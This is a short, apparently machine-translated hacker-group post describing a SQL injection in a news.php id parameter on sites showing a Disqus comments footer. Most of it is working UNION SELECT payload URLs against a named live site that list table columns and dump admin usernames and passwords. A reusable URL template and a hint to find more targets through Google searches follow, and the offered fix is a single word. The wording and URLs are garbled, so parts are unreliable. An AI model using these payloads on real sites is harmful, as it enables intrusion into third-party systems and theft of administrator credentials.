Disqus is a world-famous real-time comment system. If you don't know about it, You can Google it yourself.
Reprinted please indicate from: Silic Group Hacker Army first release
Well, this vulnerability is too weak.
In fact, news. php does not filter the id value. Check the instance:
Http://www.bkjia.com/news. php? Id =-1 + union + select + 1, 2, 3, 4, GROUP_CONCAT (DISTINCT + column_name), 6, 7, 8 + from + information_schema.columns + where + table_name = 0x61646d696e
Http://www.bkjia.com/news. php? Id =-1 + union + select + 1, 2, 3, 4, GROUP_CONCAT (DISTINCT + name0988b, 0x5f, pass0988a), 6, 7, 8 + from + admin
The test method is as follows:
Disqus_site_url/news. php? Id =-1 + union + select + 1, 2, 3, 4, GROUP_CONCAT (DISTINCT + name0988b, 0x5f, pass0988a), 6, 7, 8 + from + admin
Search for Google keywords,
Below is a blog comments powered by Disqus
The fix is: Filter